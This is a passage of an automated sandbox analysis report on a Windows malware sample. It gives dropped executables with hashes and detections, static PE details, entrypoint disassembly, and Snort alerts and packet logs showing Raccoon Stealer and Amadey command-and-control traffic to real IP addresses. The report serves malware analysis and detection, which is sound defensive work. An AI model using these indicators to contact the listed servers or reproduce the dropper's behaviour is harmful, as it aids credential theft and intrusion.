                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):512512
                                                  Entropy (8bit):7.846723941917503
                                                  Encrypted:false
                                                  SSDEEP:12288:Tw86shtDE09VgbshnKMstp7eylszgTDzLTDaMqvK8J+LF:TVhdLVg2Zep7njXzPDxC+J
                                                  MD5:F57B28AEC65D4691202B9524F84CC54A
                                                  SHA1:F546B20EB40E3BC2B6929BA0F574E32422CED30C
                                                  SHA-256:87D86132095541ED3B5FE05EB06692E1712287B6FFD9832A28EB85F52B55F0A5
                                                  SHA-512:1A773186B0A15F743F8D9681036A9ECA45E2DD5F7944725498E929C5438ACFFCD753061EB475383E5759FC41A8ADE4EB717F3D3529313C3C0D48C659B5E36F09
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\B82B.exe, Author: Florian Roth
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 39%
                                                  Reputation:unknown
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0.................. ........@.. .......................@............`.....................................S............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........u...p..........HZ..X...........................................MZ......................@...............................................!....!This program cannot be run in DOS mode....$.......PE...................." ..P.............Z8... ...@....... ....................................@..................................8..O....@..x....................`.......7............................................... ............... ..H............text...`.... ..................
                                                  C:\Users\user\AppData\Local\Temp\C1B2.exe
                                                  Process:C:\Windows\explorer.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):512952
                                                  Entropy (8bit):7.861107666291364
                                                  Encrypted:false
                                                  SSDEEP:12288:2w86shtDE09VgbshnKMstp7eylszgTDzLTDaMqvK8J+w:2VhdLVg2Zep7njXzPDxC+w
                                                  MD5:42758E2569239A774BECDB12698B124C
                                                  SHA1:4AB353C4177A69FC9A6F3844852762809591DD2F
                                                  SHA-256:E3380DFDD6297AC134BB22C7C1603782F198A5B2164855BF66A95BAE47AB472D
                                                  SHA-512:959A6D4E39BC949F8C92C4213A7DD424EFF46AACCBCE6553D42863F4341B934CEB14997F67FDC2013D064A09C6134B9A113438347B7DEDF65E3A7E2ADA5DEF18
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\C1B2.exe, Author: Florian Roth
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Reputation:unknown
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0.................. ........@.. ....................... ............`.................................D...W.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........t...^..........HY..X...........................................MZ......................@...............................................!....!This program cannot be run in DOS mode....$.......PE...................." ..P.............Z8... ...@....... ....................................@..................................8..O....@..x....................`.......7............................................... ............... ..H............text...`.... ..................
                                                  C:\Users\user\AppData\Local\Temp\CD0D.exe
                                                  Process:C:\Windows\explorer.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):212992
                                                  Entropy (8bit):6.734269361613487
                                                  Encrypted:false
                                                  SSDEEP:3072:UJ+Dg6a/6BO0fFI4+uX67vtk4nNcDxzyuEpuVMO6P2+BwvHJ3/RA:FDy/6BOSFI48v2dxzyuEpynVP
                                                  MD5:73252ACB344040DDC5D9CE78A5D3A4C2
                                                  SHA1:3A16C3698CCF7940ADFB2B2A9CC8C20B1BA1D015
                                                  SHA-256:B8AC77C37DE98099DCDC5924418D445F4B11ECF326EDD41A2D49ED6EFD2A07EB
                                                  SHA-512:1541E3D7BD163A4C348C6E5C7098C6F3ADD62B1121296CA28934A69AD308C2E51CA6B841359010DA96E71FA42FD6E09F7591448433DC3B01104007808427C3DE
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 80%
                                                  Reputation:unknown
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L......^.................V...........,.......p....@..................................q......................................\...<.... ..8............................q.................................@............p..x............................text....U.......V.................. ..`.rdata...G...p...H...Z..............@..@.data...DB..........................@....cipizi.r...........................@..@.rsrc...8.... ......................@..@........................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Temp\DF9C.exe
                                                  Process:C:\Windows\explorer.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):859648
                                                  Entropy (8bit):2.9241367623104355
                                                  Encrypted:false
                                                  SSDEEP:6144:pkY0668MzX0oJgx6nrBdkBSrBHHHI6t7af9GH0WbcSDkTDhm6Xpic76vneCVvK36:phHmzXaNIWsUwgrNt1E/Z
                                                  MD5:AB823DF932B3C2941A9015848EBDB97B
                                                  SHA1:A7E2D46ADA3A42A3D32A96937C316340F2E62A5B
                                                  SHA-256:812D78A50A8DE210DBBCE12FDA210461770B8B928F8B3249DE80ECB68055F61E
                                                  SHA-512:59AC83CED7E0A68E7491812B494E715FC19BA2AA25EDBC0B5765792A1DC19432DBF8F5B671EA4EEBF590740C63EE1A50FE4B0FC716B986F6C5070B920F5C2325
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Reputation:unknown
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R.|a.........."...0..............1... ........@.. ....................................`..................................1..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................1......H............D......Q...................................................V#... ..A#... ..A&&*...0.......... QB.o.......(....&*..0.......... .n.m.......(....&*..0..J.........(....+.~.....(....,.........+..+..*......(....(.........(....(.........*...0..........(....(.....% t..(...+.....% .g..(...+.....% ..0.(...+...... H.NB(...+.....% .z..(...+.....% [/}h(...+.....% ....(...+.....% M.3(...+.....% ....(...+.....% ....(...+.....% _.C.(...+.....% ..&d(...+..... ...}(...++". ...
                                                  C:\Users\user\AppData\Local\Temp\EA8A.exe
                                                  Process:C:\Windows\explorer.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):161280
                                                  Entropy (8bit):5.163359140538006
                                                  Encrypted:false
                                                  SSDEEP:3072:hj1+ax5s9jVultxyIAMzTjSMzTjoIe1UhCp:hJqjVoeN
                                                  MD5:9FA070AF1ED2E1F07ED8C9F6EB2BDD29
                                                  SHA1:6E1ACD6CB17AB64AC6DBF0F4400C649371B0E3BD
                                                  SHA-256:08D67F957EC38E92301EEAAAF2759EF2A070376239EAD25864C88F3DD31EAB8C
                                                  SHA-512:14A1CD1090A2ECCEA3B654EEE2B7D4DE390219F8C3C200D97D2AB431311BDF24B1B40F2F38E78804AD286654CD33DFB515704C9B863DAF0786A0D633F05C9BF2
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\EA8A.exe, Author: Florian Roth
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 43%
                                                  Reputation:unknown
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.wa..............P..l.............. ........@.. ...................................@.....................................O....................x............................................................... ............... ..H............text....k... ...l.................. ..`.rsrc................n..............@..@.reloc...............t..............@..B.......................H.......(u..t.......A...HL...(..........................................M...Z...........................................................................................@...............................................................................................................................................................................................!...........L.......!...T...h...i...s... ...p...r...o...g...r...a...m... ...c...a...n...n...o...t... ...b...e... ...r...
                                                  C:\Users\user\AppData\Local\Temp\F4BC.exe
                                                  Process:C:\Windows\explorer.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):347136
                                                  Entropy (8bit):5.994706914620217
                                                  Encrypted:false
                                                  SSDEEP:6144:5rT+Wp+Ouiv24iPmSCyf11rcrKElOoL91iH+2k9Q9:5H/p+Ouiv24gf11rcrKElOSiH
                                                  MD5:31BE6099D31BDBF1ED339EFFDC1C7064
                                                  SHA1:6B1077BE6CF57EA98C3BE8B6F0268D025EA72D88
                                                  SHA-256:9D9056D76BE4BEB3CC17CD95C47108AB42D73255F2BC031423D044ED927FB885
                                                  SHA-512:ECC057643C2E65C74F3286C8856EB57FEC75FCB650FBE864D53EC0C36C34E0DA3242E19657B1ABB75AA3EEE88A7367E77FFC0E3FE98BFEF0D180C74966D1CEDE
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 57%
                                                  Reputation:unknown
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......4...p.e.p.e.p.e....\.e.....R.e.....e.y...w.e.p.d...e....q.e.....q.e.....q.e.Richp.e.........................PE..L...g.._......................p.....p.............@...........................t.................................................P....`s.h?....................s.....0..................................@............................................text... ........................... ..`.data....io.........................@....daya........Ps.....................@....rsrc...h?...`s..@..................@..@.reloc...#....s..$...(..............@..B........................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Roaming\ffjbuft
                                                  Process:C:\Windows\explorer.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):347136
                                                  Entropy (8bit):5.994706914620217
                                                  Encrypted:false
                                                  SSDEEP:6144:5rT+Wp+Ouiv24iPmSCyf11rcrKElOoL91iH+2k9Q9:5H/p+Ouiv24gf11rcrKElOSiH
                                                  MD5:31BE6099D31BDBF1ED339EFFDC1C7064
                                                  SHA1:6B1077BE6CF57EA98C3BE8B6F0268D025EA72D88
                                                  SHA-256:9D9056D76BE4BEB3CC17CD95C47108AB42D73255F2BC031423D044ED927FB885
                                                  SHA-512:ECC057643C2E65C74F3286C8856EB57FEC75FCB650FBE864D53EC0C36C34E0DA3242E19657B1ABB75AA3EEE88A7367E77FFC0E3FE98BFEF0D180C74966D1CEDE
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 57%
                                                  Reputation:unknown
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......4...p.e.p.e.p.e....\.e.....R.e.....e.y...w.e.p.d...e....q.e.....q.e.....q.e.Richp.e.........................PE..L...g.._......................p.....p.............@...........................t.................................................P....`s.h?....................s.....0..................................@............................................text... ........................... ..`.data....io.........................@....daya........Ps.....................@....rsrc...h?...`s..@..................@..@.reloc...#....s..$...(..............@..B........................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Roaming\fijbuft
                                                  Process:C:\Windows\explorer.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):212992
                                                  Entropy (8bit):6.734269361613487
                                                  Encrypted:false
                                                  SSDEEP:3072:UJ+Dg6a/6BO0fFI4+uX67vtk4nNcDxzyuEpuVMO6P2+BwvHJ3/RA:FDy/6BOSFI48v2dxzyuEpynVP
                                                  MD5:73252ACB344040DDC5D9CE78A5D3A4C2
                                                  SHA1:3A16C3698CCF7940ADFB2B2A9CC8C20B1BA1D015
                                                  SHA-256:B8AC77C37DE98099DCDC5924418D445F4B11ECF326EDD41A2D49ED6EFD2A07EB
                                                  SHA-512:1541E3D7BD163A4C348C6E5C7098C6F3ADD62B1121296CA28934A69AD308C2E51CA6B841359010DA96E71FA42FD6E09F7591448433DC3B01104007808427C3DE
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 80%
                                                  Reputation:unknown
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L......^.................V...........,.......p....@..................................q......................................\...<.... ..8............................q.................................@............p..x............................text....U.......V.................. ..`.rdata...G...p...H...Z..............@..@.data...DB..........................@....cipizi.r...........................@..@.rsrc...8.... ......................@..@........................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Roaming\irjbuft
                                                  Process:C:\Windows\explorer.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):344064
                                                  Entropy (8bit):5.99188338211275
                                                  Encrypted:false
                                                  SSDEEP:6144:O0kWD+3Pz81AwPC4BVZ2LGuSoGZkk4mAzaV/:JZD+/CO4ULGuShkk4m1V/
                                                  MD5:3B947ED5AABDD775B1AFC31A5C4D39A0
                                                  SHA1:552AA072522F22A003CADD3BCAD5E4EB981A5CBB
                                                  SHA-256:8245AD87EEA6A1F19F658ADEF8A30B9A512760D866B7075BBF205D7A54296234
                                                  SHA-512:AE62F33E3B0DAE89BBD33481B50E6BA53F31AD8699D1570C8B03D73C2045E870CBA25A06CC3DCEA07D784CA688F63C2C335BD262B0722B4461D29AB54357C226
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 45%
                                                  Reputation:unknown
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ctw.Ctw.Ctw.,...ntw.,...atw.,...<tw.J...Dtw.Ctv.<tw.,...Btw.,...Btw.,...Btw.RichCtw.........PE..L...6.`......................p.....@.............@...........................t.....1...........................................P....Ps..?....................s.<...0...................................@............................................text.............................. ..`.data....io.........................@....lufulac.....@s.....................@....rsrc....?...Ps..@..................@..@.reloc..."....s..$..................@..B........................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Roaming\irjbuft:Zone.Identifier
                                                  Process:C:\Windows\explorer.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview: [ZoneTransfer]....ZoneId=0

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):5.99188338211275
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:25Kf6vSBoq.exe
                                                  File size:344064
                                                  MD5:3b947ed5aabdd775b1afc31a5c4d39a0
                                                  SHA1:552aa072522f22a003cadd3bcad5e4eb981a5cbb
                                                  SHA256:8245ad87eea6a1f19f658adef8a30b9a512760d866b7075bbf205d7a54296234
                                                  SHA512:ae62f33e3b0dae89bbd33481b50e6ba53f31ad8699d1570c8b03d73c2045e870cba25a06cc3dcea07d784ca688f63c2c335bd262b0722b4461d29ab54357c226
                                                  SSDEEP:6144:O0kWD+3Pz81AwPC4BVZ2LGuSoGZkk4mAzaV/:JZD+/CO4ULGuShkk4m1V/
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ctw.Ctw.Ctw.,...ntw.,...atw.,...<tw.J...Dtw.Ctv.<tw.,...Btw.,...Btw.,...Btw.RichCtw.........PE..L...6..`...................

                                                  File Icon

                                                  Icon Hash:aecaae9ecea62aa2

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x41c340
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                  DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                  Time Stamp:0x608ECA36 [Sun May 2 15:50:14 2021 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:1
                                                  File Version Major:5
                                                  File Version Minor:1
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:1
                                                  Import Hash:5243e0b7a8cb0f582099146f832c26e4

                                                  Entrypoint Preview

                                                  Instruction
                                                  mov edi, edi
                                                  push ebp
                                                  mov ebp, esp
                                                  call 00007F91648FA01Bh
                                                  call 00007F91648F33F6h
                                                  pop ebp
                                                  ret
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  mov edi, edi
                                                  push ebp
                                                  mov ebp, esp
                                                  push FFFFFFFEh
                                                  push 0043BB60h
                                                  push 00426000h
                                                  mov eax, dword ptr fs:[00000000h]
                                                  push eax
                                                  add esp, FFFFFF98h
                                                  push ebx
                                                  push esi
                                                  push edi
                                                  mov eax, dword ptr [0043D1D4h]
                                                  xor dword ptr [ebp-08h], eax
                                                  xor eax, ebp
                                                  push eax
                                                  lea eax, dword ptr [ebp-10h]
                                                  mov dword ptr fs:[00000000h], eax
                                                  mov dword ptr [ebp-18h], esp
                                                  mov dword ptr [ebp-70h], 00000000h
                                                  lea eax, dword ptr [ebp-60h]
                                                  push eax
                                                  call dword ptr [00401074h]
                                                  cmp dword ptr [02B329A0h], 00000000h
                                                  jne 00007F91648F33F0h
                                                  push 00000000h
                                                  push 00000000h
                                                  push 00000001h
                                                  push 00000000h
                                                  call dword ptr [00401100h]
                                                  call 00007F91648F3573h
                                                  mov dword ptr [ebp-6Ch], eax
                                                  call 00007F91648FCFDBh
                                                  test eax, eax
                                                  jne 00007F91648F33ECh
                                                  push 0000001Ch
                                                  call 00007F91648F3530h
                                                  add esp, 04h
                                                  call 00007F91648F87B8h
                                                  test eax, eax
                                                  jne 00007F91648F33ECh
                                                  push 00000010h
                                                  call 00007F91648F351Dh
                                                  add esp, 04h
                                                  push 00000001h
                                                  call 00007F91648FCF83h
                                                  add esp, 04h
                                                  call 00007F91648FAD9Bh
                                                  mov dword ptr [ebp-04h], 00000000h
                                                  call 00007F91648FA97Fh
                                                  test eax, eax

                                                  Rich Headers

                                                  Programming Language:
                                                  • [LNK] VS2010 build 30319
                                                  • [ASM] VS2010 build 30319
                                                  • [ C ] VS2010 build 30319
                                                  • [C++] VS2010 build 30319
                                                  • [RES] VS2010 build 30319
                                                  • [IMP] VS2008 SP1 build 30729

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x3c1940x50.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x27350000x3fa8.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x27390000x1b3c.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x12300x1c.text
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1b8080x40.text
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x10000x1dc.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x3bcd00x3be00False0.597431987213data6.99265157433IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                  .data0x3d0000x26f69a40x1600unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                  .lufulac0x27340000x2e50x400False0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                  .rsrc0x27350000x3fa80x4000False0.735473632812data6.34309337109IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0x27390000x1221c0x12400False0.0807871361301data1.04253420355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountry
                                                  RT_CURSOR0x2738ae00x130dataDivehi; Dhivehi; MaldivianMaldives
                                                  RT_ICON0x27353400x25a8dataSpanishParaguay
                                                  RT_ICON0x27378e80x10a8dataSpanishParaguay
                                                  RT_STRING0x2738d580x96dataDivehi; Dhivehi; MaldivianMaldives
                                                  RT_STRING0x2738df00x1b6dataDivehi; Dhivehi; MaldivianMaldives
                                                  RT_ACCELERATOR0x2738a200x90dataDivehi; Dhivehi; MaldivianMaldives
                                                  RT_ACCELERATOR0x27389b80x68dataDivehi; Dhivehi; MaldivianMaldives
                                                  RT_GROUP_CURSOR0x2738c100x14dataDivehi; Dhivehi; MaldivianMaldives
                                                  RT_GROUP_ICON0x27389900x22dataSpanishParaguay
                                                  RT_VERSION0x2738c280x130dataDivehi; Dhivehi; MaldivianMaldives
                                                  None0x2738ac00xadataDivehi; Dhivehi; MaldivianMaldives
                                                  None0x2738ad00xadataDivehi; Dhivehi; MaldivianMaldives
                                                  None0x2738ab00xadataDivehi; Dhivehi; MaldivianMaldives

                                                  Imports

                                                  DLLImport
                                                  KERNEL32.dllGetConsoleAliasesLengthW, TlsGetValue, GetCPInfo, HeapAlloc, InterlockedIncrement, GetSystemWindowsDirectoryW, SetEnvironmentVariableW, QueryDosDeviceA, GetNamedPipeHandleStateA, SetHandleInformation, UnlockFile, FindFirstFileExW, BackupSeek, FreeEnvironmentStringsA, GetModuleHandleW, IsBadReadPtr, GetConsoleAliasesLengthA, GetDriveTypeA, ActivateActCtx, GetPrivateProfileIntA, SetFileShortNameW, ReadConsoleInputA, GetSystemWow64DirectoryW, GetVersionExW, SetDllDirectoryA, IsDBCSLeadByte, GetSystemDirectoryA, CreateActCtxA, CompareStringW, GetStartupInfoW, VerifyVersionInfoW, GetLastError, GetLongPathNameW, SetLastError, GetProcAddress, FindVolumeMountPointClose, GlobalGetAtomNameA, FindClose, GetPrivateProfileStringA, OpenWaitableTimerA, LocalAlloc, WriteProfileSectionW, SetSystemTime, GetModuleFileNameA, SetConsoleCursorInfo, GetModuleHandleA, FindFirstChangeNotificationA, GetProcessShutdownParameters, FreeEnvironmentStringsW, BuildCommDCBA, GetCurrentDirectoryA, TlsAlloc, GetWindowsDirectoryW, GetProfileSectionW, AreFileApisANSI, DeleteFileA, LocalFileTimeToFileTime, CloseHandle, CreateFileW, SetStdHandle, GetConsoleMode, GetConsoleCP, MoveFileA, GetCommandLineW, HeapSetInformation, InterlockedDecrement, DecodePointer, ExitProcess, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, GetModuleFileNameW, WriteFile, GetStdHandle, IsProcessorFeaturePresent, GetACP, GetOEMCP, IsValidCodePage, TlsSetValue, GetCurrentThreadId, TlsFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, HeapValidate, HeapCreate, EnterCriticalSection, LeaveCriticalSection, LoadLibraryW, RtlUnwind, RaiseException, GetStringTypeW, MultiByteToWideChar, OutputDebugStringA, WriteConsoleW, OutputDebugStringW, WideCharToMultiByte, LCMapStringW, HeapReAlloc, HeapSize, HeapQueryInformation, HeapFree, SetFilePointer, FlushFileBuffers
                                                  USER32.dllGetMenuInfo, GetMessagePos
                                                  WINHTTP.dllWinHttpReadData

                                                  Version Infos

                                                  DescriptionData
                                                  Translations0x0512 0x00ac

                                                  Possible Origin

                                                  Language of compilation systemCountry where language is spokenMap
                                                  Divehi; Dhivehi; MaldivianMaldives
                                                  SpanishParaguay

                                                  Network Behavior

                                                  Snort IDS Alerts

                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                  10/29/21-20:30:35.457420TCP2033973ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download)4981280192.168.2.791.219.236.97
                                                  10/29/21-20:30:40.016951TCP2027700ET TROJAN Amadey CnC Check-In4982380192.168.2.7185.215.113.45
                                                  10/29/21-20:30:46.932390TCP2033973ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download)4981280192.168.2.791.219.236.97
                                                  10/29/21-20:32:34.929005ICMP399ICMP Destination Unreachable Host Unreachable192.168.255.2192.168.2.7
                                                  10/29/21-20:32:34.929028ICMP399ICMP Destination Unreachable Host Unreachable192.168.255.2192.168.2.7

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Oct 29, 2021 20:29:20.890466928 CEST4974780192.168.2.7185.98.87.159
                                                  Oct 29, 2021 20:29:20.943439960 CEST8049747185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:20.944004059 CEST4974780192.168.2.7185.98.87.159
                                                  Oct 29, 2021 20:29:20.944181919 CEST4974780192.168.2.7185.98.87.159
                                                  Oct 29, 2021 20:29:20.944200039 CEST4974780192.168.2.7185.98.87.159
                                                  Oct 29, 2021 20:29:20.996998072 CEST8049747185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.022907019 CEST8049747185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.023206949 CEST4974780192.168.2.7185.98.87.159
                                                  Oct 29, 2021 20:29:21.025151014 CEST4974780192.168.2.7185.98.87.159
                                                  Oct 29, 2021 20:29:21.056564093 CEST4974880192.168.2.7185.98.87.159
                                                  Oct 29, 2021 20:29:21.077682972 CEST8049747185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.109009981 CEST8049748185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.109253883 CEST4974880192.168.2.7185.98.87.159
                                                  Oct 29, 2021 20:29:21.109474897 CEST4974880192.168.2.7185.98.87.159
                                                  Oct 29, 2021 20:29:21.109504938 CEST4974880192.168.2.7185.98.87.159
                                                  Oct 29, 2021 20:29:21.161972046 CEST8049748185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.187556982 CEST8049748185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.187690020 CEST4974880192.168.2.7185.98.87.159
                                                  Oct 29, 2021 20:29:21.187942982 CEST4974880192.168.2.7185.98.87.159
                                                  Oct 29, 2021 20:29:21.220020056 CEST4974980192.168.2.7185.98.87.159
                                                  Oct 29, 2021 20:29:21.240024090 CEST8049748185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.273682117 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.273789883 CEST4974980192.168.2.7185.98.87.159
                                                  Oct 29, 2021 20:29:21.273890018 CEST4974980192.168.2.7185.98.87.159
                                                  Oct 29, 2021 20:29:21.369220972 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.423413038 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.423449039 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.423465967 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.423481941 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.423501015 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.423532009 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.423538923 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.423543930 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.423558950 CEST4974980192.168.2.7185.98.87.159
                                                  Oct 29, 2021 20:29:21.423562050 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.423579931 CEST8049749185.98.87.159192.168.2.7
